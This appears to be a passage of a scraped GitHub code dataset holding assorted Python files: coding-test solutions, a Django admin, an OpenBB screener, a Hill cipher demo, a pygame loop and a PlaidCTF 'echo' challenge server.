session\n await self.handle_session()\n\n return resp\n","repo_name":"aio-libs/sockjs","sub_path":"sockjs/transports/eventsource.py","file_name":"eventsource.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"85"} +{"seq_id":"72136696918","text":"from django.contrib import admin\nfrom .models import Hospital, AppointmentSlot\n\n# Register your models here.\n\nclass HospitalAdministration(admin.ModelAdmin):\n list_display = (\"name\", \"location\", \"specialty\",)\n list_filter = list_display\n\nclass AppointmentSlotAdministration(admin.ModelAdmin):\n list_display = (\n \"hospital\",\n \"start\", \n \"end\", \n \"general_user\", \n \"hospital_staff\",\n \"status\",\n )\n search_fields = list_display\n list_filter = list_display\n\nadmin.site.register(Hospital, HospitalAdministration)\nadmin.site.register(AppointmentSlot, AppointmentSlotAdministration)\n","repo_name":"Lifespark-Technologies/Infomed","sub_path":"hospitals/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"23455591805","text":"#짝수와 홀수\ndef solution(num):\n answer = \"\"\n if num % 2 == 0 or num == 0:\n 
answer = \"Even\"\n elif num % 2 == 1:\n answer = \"Odd\"\n return answer\n\n#Test Case\nret = solution(3)\nprint(ret)\nret = solution(4)\nprint(ret)","repo_name":"plmqazoknijb/pythonCodingTest","sub_path":"Lv_1/220103.py","file_name":"220103.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"25617410214","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*- \n# Author: Ryan\n# @Time: 2018/3/24 上午11:43\n\nimport queue\n\nclass TreeNode(object):\n def __init__(self,val,left=None,right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass BinaryTree(object):\n def __init__(self,root=None):\n self.root = root\n def breathSearch(self):\n if self.root == None:\n return None\n retList = []\n q = queue.Queue() #创建了一个队列\n q.put(self.root) #将根结点放入队列中\n #只要队列不为空,则遍历节点,并分别把左子节点和右子节点放入列表中\n while q.empty() is not True:\n node = q.get()\n retList.append(node.var)\n\n if node.left != None:\n q.put(node.left)\n if node.right != None:\n q.put(node.right)\n return retList\n\n\n\n\n","repo_name":"Ryan111111/DataStructure_python","sub_path":"树的广度优先遍历.py","file_name":"树的广度优先遍历.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"28068140020","text":"\"\"\" Options Screener Controller Module \"\"\"\n__docformat__ = \"numpy\"\n\nimport argparse\nimport logging\nfrom typing import List\n\nfrom openbb_terminal import feature_flags as obbff\nfrom openbb_terminal.custom_prompt_toolkit import NestedCompleter\nfrom openbb_terminal.decorators import log_start_end\nfrom openbb_terminal.helper_funcs import EXPORT_ONLY_RAW_DATA_ALLOWED, check_positive\nfrom openbb_terminal.menu import session\nfrom openbb_terminal.parent_classes import BaseController\nfrom openbb_terminal.rich_config import MenuText, console\nfrom openbb_terminal.stocks.comparison_analysis import ca_controller\nfrom openbb_terminal.stocks.options.screen import syncretism_model, syncretism_view\n\n# pylint: disable=E1121\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass ScreenerController(BaseController):\n \"\"\"Screener Controller class\"\"\"\n\n CHOICES_COMMANDS = [\"view\", \"set\", \"scr\"]\n CHOICES_MENUS = [\n \"ca\",\n ]\n\n preset_choices = syncretism_model.get_preset_choices()\n\n PATH = \"/stocks/options/screen/\"\n\n def __init__(self, queue: List[str] = None):\n \"\"\"Constructor\"\"\"\n super().__init__(queue)\n\n self.preset = \"high_IV\"\n self.screen_tickers: List = list()\n\n if session and obbff.USE_PROMPT_TOOLKIT:\n choices: dict = {c: {} for c in self.controller_choices}\n presets: dict = {c: {} for c in self.preset_choices}\n choices[\"view\"] = presets\n choices[\"set\"] = presets\n choices[\"scr\"] = presets\n choices[\"scr\"][\"--limit\"] = None\n choices[\"scr\"][\"-l\"] = \"--limit\"\n\n self.completer = NestedCompleter.from_nested_dict(choices)\n\n def print_help(self):\n \"\"\"Print help\"\"\"\n mt = MenuText(\"stocks/options/screen/\")\n mt.add_cmd(\"view\")\n mt.add_cmd(\"set\")\n mt.add_raw(\"\\n\")\n mt.add_param(\"_preset\", self.preset)\n mt.add_raw(\"\\n\")\n mt.add_cmd(\"scr\")\n mt.add_raw(\"\\n\")\n mt.add_param(\"_screened_tickers\", \", \".join(self.screen_tickers))\n mt.add_raw(\"\\n\")\n mt.add_menu(\"ca\")\n console.print(text=mt.menu_text, menu=\"Stocks - Options - Screener\")\n\n @log_start_end(log=logger)\n def call_view(self, other_args: List[str]):\n \"\"\"Process view 
command\"\"\"\n parser = argparse.ArgumentParser(\n add_help=False,\n prog=\"view\",\n description=\"\"\"View available presets under presets folder.\"\"\",\n )\n parser.add_argument(\n \"-p\",\n \"--preset\",\n action=\"store\",\n dest=\"preset\",\n type=str,\n help=\"View specific custom preset\",\n default=\"\",\n choices=self.preset_choices,\n )\n if other_args and \"-\" not in other_args[0][0]:\n other_args.insert(0, \"-p\")\n ns_parser = self.parse_known_args_and_warn(parser, other_args)\n if ns_parser:\n if ns_parser.preset:\n syncretism_view.view_available_presets(preset=ns_parser.preset)\n\n else:\n for preset in self.preset_choices:\n console.print(preset)\n console.print(\"\")\n\n @log_start_end(log=logger)\n def call_set(self, other_args: List[str]):\n \"\"\"Process set command\"\"\"\n parser = argparse.ArgumentParser(\n add_help=False,\n prog=\"set\",\n description=\"\"\"Set preset from custom and default ones.\"\"\",\n )\n parser.add_argument(\n \"-p\",\n \"--preset\",\n action=\"store\",\n dest=\"preset\",\n type=str,\n default=\"template\",\n help=\"Filter presets\",\n choices=self.preset_choices,\n )\n if other_args and \"-\" not in other_args[0][0]:\n other_args.insert(0, \"-p\")\n ns_parser = self.parse_known_args_and_warn(parser, other_args)\n if ns_parser:\n self.preset = ns_parser.preset\n console.print(\"\")\n\n @log_start_end(log=logger)\n def call_scr(self, other_args: List[str]):\n \"\"\"Process scr command\"\"\"\n parser = argparse.ArgumentParser(\n add_help=False,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n prog=\"scr\",\n description=\"\"\"Screener filter output from https://ops.syncretism.io/index.html.\n Where: CS: Contract Symbol; S: Symbol, T: Option Type; Str: Strike; Exp v: Expiration;\n IV: Implied Volatility; LP: Last Price; B: Bid; A: Ask; V: Volume; OI: Open Interest;\n Y: Yield; MY: Monthly Yield; SMP: Regular Market Price; SMDL: Regular Market Day Low;\n SMDH: Regular Market Day High; LU: Last Trade Date; LC: Last Crawl; ITM: In The Money;\n PC: Price Change; PB: Price-to-book. \"\"\",\n )\n parser.add_argument(\n \"-p\",\n \"--preset\",\n action=\"store\",\n dest=\"preset\",\n type=str,\n default=self.preset,\n help=\"Filter presets\",\n choices=self.preset_choices,\n )\n parser.add_argument(\n \"-l\",\n \"--limit\",\n type=check_positive,\n default=10,\n help=\"Limit of random entries to display. 
Default shows all\",\n dest=\"limit\",\n )\n\n if other_args and \"-\" not in other_args[0][0]:\n other_args.insert(0, \"-p\")\n ns_parser = self.parse_known_args_and_warn(\n parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED\n )\n if ns_parser:\n self.screen_tickers = syncretism_view.view_screener_output(\n preset=ns_parser.preset,\n limit=ns_parser.limit,\n export=ns_parser.export,\n )\n\n @log_start_end(log=logger)\n def call_ca(self, _):\n \"\"\"Call the comparison analysis menu with selected tickers\"\"\"\n if self.screen_tickers:\n self.queue = ca_controller.ComparisonAnalysisController(\n self.screen_tickers, self.queue\n ).menu(custom_path_menu_above=\"/stocks/\")\n else:\n console.print(\n \"Some tickers must be screened first through one of the presets!\\n\"\n )\n","repo_name":"irvinbma/OpenBBTerminal-Finance","sub_path":"openbb_terminal/stocks/options/screen/screener_controller.py","file_name":"screener_controller.py","file_ext":"py","file_size_in_byte":6215,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"85"} +{"seq_id":"10019170759","text":"# You are given an array of integers nums, there is a sliding window of size k which is moving from the very left of the array to the very right. You can only see the k numbers in the window. Each time the sliding window moves right by one position.\n#\n# Return the max sliding window.\n#\n#  \n# Example 1:\n#\n#\n# Input: nums = [1,3,-1,-3,5,3,6,7], k = 3\n# Output: [3,3,5,5,6,7]\n# Explanation: \n# Window position Max\n# --------------- -----\n# [1 3 -1] -3 5 3 6 7 3\n# 1 [3 -1 -3] 5 3 6 7 3\n# 1 3 [-1 -3 5] 3 6 7 5\n# 1 3 -1 [-3 5 3] 6 7 5\n# 1 3 -1 -3 [5 3 6] 7 6\n# 1 3 -1 -3 5 [3 6 7] 7\n#\n#\n# Example 2:\n#\n#\n# Input: nums = [1], k = 1\n# Output: [1]\n#\n#\n# Example 3:\n#\n#\n# Input: nums = [1,-1], k = 1\n# Output: [1,-1]\n#\n#\n# Example 4:\n#\n#\n# Input: nums = [9,11], k = 2\n# Output: [11]\n#\n#\n# Example 5:\n#\n#\n# Input: nums = [4,-2], k = 2\n# Output: [4]\n#\n#\n#  \n# Constraints:\n#\n#\n# \t1 <= nums.length <= 105\n# \t-104 <= nums[i] <= 104\n# \t1 <= k <= nums.length\n#\n#\n\n\nclass Solution:\n def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:\n # 优先队列 MaxHeap \n \n # deque: 双端队列 \n if not nums: return [] \n # window 存储下标\n window, res = [], []\n for i, x in enumerate(nums):\n \n if i >= k and window[0] <= i-k:\n window.pop(0)\n \n while window and nums[window[-1]] <= x:\n window.pop()\n \n window.append(i)\n \n if i >= k -1:\n res.append(nums[window[0]])\n return res\n","repo_name":"chyidl/leetcode","sub_path":"0239-sliding-window-maximum/sliding-window-maximum.py","file_name":"sliding-window-maximum.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"43393850123","text":"from uaperrors import UAPError\nimport sys\nimport os\nimport yaml\nfrom logging import getLogger\nfrom abstract_step import AbstractStep\n\nlogger = getLogger('uap_logger')\n\n\nclass Task(object):\n '''\n A task represents a certain run of a certain step.\n '''\n\n def __init__(self, pipeline, step, run_id, run_index):\n self.pipeline = pipeline\n self.step = step\n self.run_id = run_id\n self.run_index = run_index\n\n def __str__(self):\n return '%s/%s' % (self.step.get_step_name(), self.run_id)\n\n def get_pipeline(self):\n '''\n Returns the pipeline this task belongs to.\n '''\n return self.pipeline\n\n def get_step(self):\n '''\n Returns the step of this task.\n '''\n return 
self.step\n\n def get_run(self):\n '''\n Returns the run object for this task.\n '''\n return self.step.get_run(self.run_id)\n\n def get_task_state(self, do_hash=False):\n '''\n Proxy method for run.get_state().\n '''\n return self.get_run().get_state(do_hash=do_hash)\n\n def run(self):\n '''\n Run the task. Skip if it's already finished. Raise Exception\n if it's not ready.\n '''\n task_state = self.get_task_state()\n if task_state == self.pipeline.states.FINISHED:\n self.pipeline.notify(\n \"Skipping task: %s is already finished.\" %\n self)\n return\n if task_state == self.pipeline.states.WAITING:\n raise UAPError(\"%s cannot be run yet.\" % self)\n self.step.run(self.run_id)\n\n def input_files(self):\n '''\n Return a list of input files required by this task.\n '''\n result = set()\n run_info = self.get_run()\n for annotation, outfiles in run_info.get_output_files_abspath().items():\n for outpath, infiles in outfiles.items():\n if infiles is not None:\n for path in infiles:\n result.add(path)\n return list(result)\n\n def output_files(self):\n '''\n Return a list of output files produced by this task.\n '''\n result = []\n run_info = self.get_run()\n for annotation, outfiles in run_info.get_output_files_abspath().items():\n for path in outfiles.keys():\n result.append(path)\n return result\n\n def get_parent_tasks(self):\n '''\n Returns a list of parent tasks which this task depends on.\n '''\n result = set()\n for path in self.input_files():\n result.add(self.pipeline.get_task_for_file(path))\n\n return list(result)\n\n def move_ping_file(self, bad_copy=True):\n '''\n Removes the queued ping of a task to remove the QUEUED state\n and optionally keeps \"bad_copy\" to mark the task as BAD.\n '''\n ping_file = self.get_run().get_queued_ping_file()\n self.step.remove_ping_file(ping_file, bad_copy=bad_copy)\n\n def volatilize_if_possible(self, srsly=False):\n result = set()\n if not self.step.is_volatile():\n return result\n fsc = self.get_run().fsc\n for path_a in self.output_files():\n if not path_a:\n continue\n if fsc.exists(path_a):\n # now check whether we can volatilize path A\n path_a_can_be_removed = True\n path_a_dependent_files = list()\n if path_a in self.pipeline.file_dependencies_reverse:\n for path_b in self.pipeline.file_dependencies_reverse[path_a]:\n path_a_dependent_files.append(path_b)\n # don't check whether the output file B exists,\n # it might also be volatile, rather check whether the\n # task which creates B is finished\n path_b_task = self.pipeline.get_task_for_file(path_b)\n if path_b_task.get_task_state() != \\\n self.pipeline.states.FINISHED:\n path_a_can_be_removed = False\n break\n\n if path_a_can_be_removed:\n result.add(path_a)\n if srsly:\n self.pipeline.notify(\n \"Now volatilizing %s: %s\" %\n (str(self), os.path.basename(path_a)))\n info = dict()\n info['self'] = dict()\n info['self']['size'] = fsc.getsize(path_a)\n info['self']['mtime'] = fsc.getmtime(path_a)\n info['downstream'] = dict()\n for path_b in path_a_dependent_files:\n info['downstream'][path_b] = dict()\n if fsc.exists(path_b):\n info['downstream'][path_b]['size'] = fsc.getsize(\n path_b)\n info['downstream'][path_b]['mtime'] = fsc.getmtime(\n path_b)\n else:\n downstream_info = yaml.load(\n open(\n path_b +\n AbstractStep.VOLATILE_SUFFIX,\n 'r'),\n Loader=yaml.FullLoader)\n info['downstream'][path_b]['size'] = downstream_info['self']['size']\n info['downstream'][path_b]['mtime'] = downstream_info['self']['mtime']\n\n path_a_volatile = path_a + AbstractStep.VOLATILE_SUFFIX\n with 
open(path_a_volatile, 'w') as f:\n f.write(yaml.dump(info, default_flow_style=False))\n\n os.utime(\n path_a_volatile,\n (os.path.getatime(path_a),\n os.path.getmtime(path_a)))\n os.unlink(path_a)\n return result\n","repo_name":"curiousTauseef/uap","sub_path":"include/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":6214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"85"} +{"seq_id":"21198407432","text":"import pygame, sys\n\nclock = pygame.time.Clock()\n\nfrom pygame.locals import *\n\nfrom sprites import * #dialog, logic\n\nimport math\n\nfrom tiles import *\n\nfrom lvl import *\n\nfrom pygame.freetype import *\n\nvec = pygame.math.Vector2\n\npygame.init()\npygame.display.set_caption('V for Ved')\n\nWINDOW_SIZE = (1280,768) #subject to change\nscreen = pygame.display.set_mode(WINDOW_SIZE)\ntile_group = pygame.sprite.Group()\n\n#render = pygame.Surface((1280, 768)) #x value can be changed depending on the level\n\nrender = pygame.Surface((10000, 10000))\n\nplayer = Vee()\nodd = Odd()\n\ndef loadLevel(X, Y):\n for y in range(0,Y): #render tiles based on tile map\n for x in range(0,X):\n coord = level[y][x]\n if coord == 1:\n tile_group.add(Tile(x*64,y*64,'Assets/Tiles/Mossy_Stone/MOSSY_STONE0.png',1,1))\n if coord == 2:\n tile_group.add(Tile(x*64,y*64,'Assets/Tiles/Mossy_Stone/MOSSY_STONE1.png',1,1))\n if coord == 3:\n tile_group.add(Tile(x*64,y*64,'Assets/Tiles/Mossy_Stone/MOSSY_STONETOP.png',1,1))\n\nGAME_FONT = Font('Fonts/manaspace/manaspc.ttf', 24)\n\nplayer_group = pygame.sprite.Group(player)\nnpc_group = pygame.sprite.Group(odd)\n\np_location = [250,250]\np_yvel = 0\n\nmv_r = False\nmv_l = False\njump = False\ncontact_floor = False\n\n#loadLevel(20,12)\n\nloadLevel(26,13)\n\ncamloc = [0,0]\n\ncamx = 0\n\ncamy = 0\n\nwhile True: #gameloop\n screen.fill((24,123,120))\n render.fill((24,123,120))\n\n for event in pygame.event.get():\n \n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n if event.type == KEYDOWN:\n if event.key == K_RIGHT:\n mv_r = True\n if event.key == K_LEFT:\n mv_l = True\n if event.key == K_UP:\n jump = True\n if event.type == KEYUP:\n if event.key == K_RIGHT:\n mv_r = False\n if event.key == K_LEFT:\n mv_l = False\n if event.key == K_UP:\n jump = False\n \n if player.mv == 'r':\n camx = -3.8\n elif player.mv == 'l':\n camx = 3.8\n elif player.mv == 'c':\n camx *= 0.9\n #camx = 0\n else:\n camx *= 0.9\n #camx = 0\n camy = (player.yvel/10)\n #camx *= 0.8\n \n camloc[0] += camx\n camloc[1] += camy\n\n tile_group.draw(render)\n\n\n player_group.update(mv_l,mv_r, jump)\n player_group.draw(render)\n screen.blit(render, (camloc[0]-3, camloc[1]*2.5+120))\n\n\n text_surface, rect = GAME_FONT.render(\"Hello, VEE!\", (0, 0, 0))\n screen.blit(text_surface, (140+camloc[0]*2, 250+camloc[1]*2))\n\n #npc_group.update()\n #npc_group.draw(screen)\n \n \n pygame.display.update()\n \n clock.tick(10)","repo_name":"cvtsh248/V-For-Ved","sub_path":"Scripts/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"10910316655","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nimport numpy as np\n\ndef chiffrement_hill(message, matrice_cle):\n # Convertir le message en lettres majuscules et supprimer les espaces\n message = message.replace(\" \", \"\").upper()\n\n # Vérifier si la longueur du message est compatible avec la taille de la matrice clé\n if len(message) % len(matrice_cle) != 0:\n 
raise ValueError(\"La longueur du message doit être un multiple de la taille de la matrice clé\")\n\n # Initialiser le texte chiffré\n texte_chiffre = \"\"\n\n # Itérer à travers le message par blocs de la taille de la matrice clé\n for i in range(0, len(message), len(matrice_cle)):\n bloc = message[i:i + len(matrice_cle)]\n vecteur_message = np.array([ord(caractere) - ord('A') for caractere in bloc])\n vecteur_chiffre = np.dot(matrice_cle, vecteur_message) % 26\n bloc_chiffre = ''.join([chr(caractere + ord('A')) for caractere in vecteur_chiffre])\n texte_chiffre += bloc_chiffre\n\n return texte_chiffre\n\n\n# In[8]:\n\n\nmatrice_cle = np.array([[6, 24, 1], [13, 16, 10], [20, 17, 15]])\nmessage = \"HELLOO\"\nmessage_chiffre = chiffrement_hill(message, matrice_cle)\nprint(\"Message Chiffré:\", message_chiffre)\n\n\n# In[4]:\n\n\nimport numpy as np\n\ndef dechiffrement_hill(texte_chiffre, matrice_cle):\n # Calculer la matrice inverse de la matrice de clé\n determinant = int(round(np.linalg.det(matrice_cle)))\n matrice_inverse = np.linalg.inv(matrice_cle)\n matrice_inverse = (matrice_inverse * determinant) % 26\n matrice_inverse = matrice_inverse.astype(int)\n\n # Convertir le texte chiffré en lettres majuscules\n texte_chiffre = texte_chiffre.upper()\n\n # Initialiser le texte déchiffré\n texte_dechiffre = \"\"\n\n # Itérer à travers le texte chiffré en blocs de la taille de la matrice clé\n for i in range(0, len(texte_chiffre), len(matrice_cle)):\n bloc = texte_chiffre[i:i + len(matrice_cle)]\n vecteur_chiffre = np.array([ord(caractere) - ord('A') for caractere in bloc])\n vecteur_dechiffre = np.dot(matrice_inverse, vecteur_chiffre) % 26\n bloc_dechiffre = ''.join([chr(caractere + ord('A')) for caractere in vecteur_dechiffre])\n texte_dechiffre += bloc_dechiffre\n\n return texte_dechiffre\n\n\n# In[10]:\n\n\n# Exemple d'utilisation :\nmatrice_cle = np.array([[6, 24, 1], [13, 16, 10], [20, 17, 15]])\nmessage_chiffre = \"TFJANS\"\nmessage_dechiffre = dechiffrement_hill(message_chiffre, matrice_cle)\nprint(\"Message Déchiffré:\", message_dechiffre)\n\n","repo_name":"yazidiyassine/Cryptography","sub_path":"chiffrement de Hill.py","file_name":"chiffrement de Hill.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"14180122108","text":"import codecs\nimport xlrd\nimport csv\nimport os\n\n# 将源目录下的 xlsx 文件转移到目的目录下,并修改格式为 csv\ndef xlsxTocsv(source_dir,target_dir):\n L = []\n for root, dirs, files in os.walk(source_dir):\n for file in files:\n if os.path.splitext(file)[1] == '.xlsx':\n L.append(os.path.join(root, file).replace('\\\\','/'))\n\n for path in L:\n\n path = './' + path\n print(path)\n\n name = path.split('/')[3].split('_')[0]\n print(name)\n\n workbook = xlrd.open_workbook(path)\n table = workbook.sheet_by_index(0)\n res = target_dir + name + '_reports_data.csv'\n with codecs.open(res, 'w', encoding='utf-8') as f:\n write = csv.writer(f)\n for row_num in range(table.nrows):\n row_value = table.row_values(row_num)\n write.writerow(row_value)\n\nxlsxTocsv('20210408_14-32-55','./CSVdata/')","repo_name":"Hanqing1996/multifactor-framework-strategy","sub_path":"DealWithReportsTable/xlsx_to_csv.py","file_name":"xlsx_to_csv.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"34960877738","text":"from flask import render_template, flash, redirect, request, send_from_directory, url_for\nimport 
uuid\nimport os\nimport subprocess\nimport random\n\ncwd = os.getcwd()\ntmp_path = \"/tmp/echo/\"\nserve_dir = \"audio/\"\ndocker_cmd = \"docker run -m=100M --cpu-period=100000 --cpu-quota=40000 --network=none -v {path}:/share lumjjb/echo_container:latest python run.py\"\nconvert_cmd = \"ffmpeg -i {in_path} -codec:a libmp3lame -qscale:a 2 {out_path}\"\n\nMAX_TWEETS = 4\nMAX_TWEET_LEN = 140\n\n\nfrom flask import Flask\napp = Flask(__name__)\nflag = \"PCTF{XXXXXXX...XXXXXXXX}\"\n\nif not os.path.exists(tmp_path):\n os.makedirs(tmp_path)\n\n\ndef process_flag (outfile):\n with open(outfile,'w') as f:\n for x in flag:\n c = 0\n towrite = ''\n for i in range(65000 - 1):\n k = random.randint(0,127)\n c = c ^ k\n towrite += chr(k)\n\n f.write(towrite + chr(c ^ ord(x)))\n return\n\ndef process_audio (path, prefix, n):\n target_path = serve_dir + prefix\n if not os.path.exists(target_path):\n os.makedirs(target_path)\n\n for i in range(n):\n st = os.stat(path + str(i+1) + \".wav\")\n if st.st_size < 5242880:\n subprocess.call (convert_cmd.format(in_path=path + str(i+1) + \".wav\",\n out_path=target_path + str(i+1) + \".wav\").split())\n\n\n@app.route('/audio/')\ndef static_file(path):\n return send_from_directory('audio', path)\n\n@app.route(\"/listen\",methods=['GET', 'POST'])\ndef listen_tweets():\n n = int(request.args['n'])\n my_uuid = request.args['my_uuid']\n\n if n > MAX_TWEETS:\n return \"ERR: More than MAX_TWEETS\"\n\n afiles = [my_uuid + \"/\" + str(i+1) + \".wav\" for i in range(n)]\n return render_template('listen.html', afiles = afiles)\n\n@app.route(\"/\",methods=['GET', 'POST'])\ndef read_tweets():\n t1 = request.args.get('tweet_1')\n if t1:\n tweets = []\n for i in range(MAX_TWEETS):\n t = request.args.get('tweet_' + str(i+1))\n if len(t) > MAX_TWEET_LEN:\n return \"ERR: Violation of max tween length\"\n\n if not t:\n break\n tweets.append(t)\n\n my_uuid = uuid.uuid4().hex\n my_path = tmp_path + my_uuid + \"/\"\n\n if not os.path.exists(my_path):\n os.makedirs(my_path)\n\n with open(my_path + \"input\" ,\"w\") as f:\n f.write('\\n'.join(tweets))\n\n process_flag(my_path + \"flag\")\n\n out_path = my_path + \"out/\"\n if not os.path.exists(out_path):\n os.makedirs(out_path)\n\n subprocess.call(docker_cmd.format(path=my_path).split())\n process_audio(out_path, my_uuid + '/', len(tweets))\n\n return redirect(url_for('.listen_tweets', my_uuid=my_uuid, n=len(tweets)))\n\n else:\n return render_template('form.html')\n\nif __name__ == \"__main__\":\n app.run(threaded=True)\n","repo_name":"Qwaz/solved-hacking-problem","sub_path":"PlaidCTF/2017/echo/echo.py","file_name":"echo.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"85"} +{"seq_id":"31061873373","text":"# import module from tkinter for UI\r\nfrom tkinter import *\r\nimport os\r\nfrom datetime import datetime;\r\n\r\n# creating instance of TK\r\nroot = Tk()\r\n\r\nroot.configure(background=\"white\")\r\n\r\n\r\ndef function1():\r\n os.system(\"python car.py\")\r\n\r\n\r\ndef function2():\r\n os.system(\"python two_wheeler.py\")\r\n\r\n\r\ndef function3():\r\n os.system(\"python pedestrian.py\")\r\n\r\n\r\ndef function4():\r\n os.system(\"python bus.py\")\r\n\r\n\r\ndef function6():\r\n root.destroy()\r\n\r\n\r\n# stting title for the window\r\n\r\nroot.title(\"Vehicle Finder\")\r\n\r\n# creating a text label\r\nLabel(root, text=\"Vehicle and Pedestrian Detection\", font=(\"times new roman\", 20), fg=\"white\", bg=\"black\",\r\n 
height=3).grid(row=0, rowspan=2, columnspan=2, sticky=N + E + W + S, padx=5, pady=5)\r\n\r\n# creating first button\r\nButton(root, text=\"CAR DETECTION\", font=(\"times new roman\", 20), bg=\"#000000\", fg='green', command=function1).grid(\r\n row=4, columnspan=2, sticky=W + E + N + S, padx=5, pady=5)\r\n\r\n# creating second button\r\nButton(root, text=\"TWO WHEELER DETECTION\", font=(\"times new roman\", 20), bg=\"#000000\", fg='green',\r\n command=function2).grid(row=5, columnspan=2, sticky=N + E + W + S, padx=5, pady=5)\r\n\r\n# creating third button\r\nButton(root, text=\"PEDESTRIAN DETECTION\", font=('times new roman', 20), bg=\"#000000\", fg=\"green\",\r\n command=function3).grid(row=6, columnspan=2, sticky=N + E + W + S, padx=5, pady=5)\r\n\r\nButton(root, text=\"BUS DETECTION\", font=('times new roman', 20), bg=\"#000000\", fg=\"green\", command=function4).grid(\r\n row=7, columnspan=2, sticky=N + E + W + S, padx=5, pady=5)\r\n\r\nButton(root, text=\"EXIT\", font=('times new roman', 20), bg=\"black\", fg=\"red\", command=function6).grid(row=9,\r\n columnspan=2,\r\n sticky=N + E + W + S,\r\n padx=5, pady=5)\r\n\r\nroot.mainloop()\r\n","repo_name":"ps217/Vehicle-Detection","sub_path":"UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"23264655606","text":"# Given an array nums containing n + 1 integers where each integer is between 1 and n (inclusive), prove that at least one duplicate number must exist. Assume that there is only one duplicate number, find the duplicate one.\n\n# Example 1:\n\n# Input: [1,3,4,2,2]\n# Output: 2\n# Example 2:\n\n# Input: [3,1,3,4,2]\n# Output: 3\n\n\nclass Solution(object):\n def findDuplicate(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n left, right = 1, len(nums)-1\n while left < right:\n mid = (left + right) // 2\n cnt = 0\n for num in nums:\n if num <= mid:\n cnt += 1\n if cnt > mid:\n right = mid \n else:\n left = mid + 1 \n return left\n\n# Time: O(nlog(n))\n# Space: O(1)\n# Difficulty: medium","repo_name":"wenxinjie/leetcode","sub_path":"binary search/python/leetcode287_Find_the_Duplicate_Number.py","file_name":"leetcode287_Find_the_Duplicate_Number.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"6789465472","text":"import os.path\nfrom data.base_dataset import BaseDataset, normalize\nfrom data.image_folder import make_dataset\nfrom functools import partial\nimport re\n\n\ndef extract_frame_id_int(path, pattern):\n # extract frame id as int\n return int(pattern.search(path).group(1))\n\n\nclass FrameDataset(BaseDataset):\n def __init__(self, root=None, opt=None):\n if root:\n self.root = root\n self.opt = opt\n self.dir_frames = root\n self.sort_key = partial(extract_frame_id_int,\n pattern=re.compile('(\\d+)[\\.jpg|\\.png]'))\n self.frame_paths = sorted([i for i in make_dataset(self.root)],\n key=self.sort_key)\n self.frame_count = len(self.frame_paths)\n self.dataset_size = self.frame_count - 1\n\n def initialize(self, opt):\n self.opt = opt\n self.root = opt.dataroot\n\n ### frames\n dir_frames = '_frames'\n self.dir_frames = os.path.join(opt.dataroot, opt.phase + dir_frames)\n self.dir_frames = self.sort()\n self.frame_paths = sorted([i for i in make_dataset(self.dir_frames)],\n key=self.sort_key)\n self.frame_count = len(self.frame_paths)\n self.dataset_size = self.frame_count - 
1\n\n print(\"FrameDataset initialized from: %s\" % self.dir_frames)\n print(\"contains %d frames, %d consecutive pairs\" % (self.frame_count, self.dataset_size))\n\n def __getitem__(self, index):\n\n left_frame_path = self.frame_paths[index]\n right_frame_path = self.frame_paths[index+1]\n\n input_dict = {\n 'left_path': left_frame_path,\n 'right_path': right_frame_path,\n }\n\n return input_dict\n\n def __len__(self):\n # batchSize>1 not tested\n return self.dataset_size\n\n def name(self):\n return 'FrameDataset'\n","repo_name":"Kebniss/AutoDetect","sub_path":"Unsupervised/pix2pixHD/data/frame_dataset.py","file_name":"frame_dataset.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"13152859432","text":"from collections import deque\nimport copy\ndef solution(n, computers):\n '''\n 그래프 탐색을 통해 노드와 모든 연결된 노드를 탐색하고, 시작 노드를 방문처리\n computers모든 노드에 대해 반복한다.\n '''\n def dfs(graph, v, visited):\n visited[v] = True\n n = len(graph)\n for node in range(n):\n if graph[v][node] == 1 and visited[node] == False:\n dfs(graph, node, visited)\n\n answer = 0\n visited = [0] * n\n for start in range(n): #n개의 노드를 각각 시작노드로 dfs\n if visited[start] == 0: #이전 탐색에서 방문하지 않았을 경우에만 탐색 시작\n dfs(computers, start, visited)\n answer +=1\n return answer\n\ndef main(n, computers):\n result = dict()\n for s in range(n): # N\n q = deque() # 1\n q.append(s) # 1\n visit_info = set()\n visit_info.add(s)\n tmp = copy.deepcopy(computers)\n while q: # N\n c = q.popleft() # 1\n for i in range(n):\n if 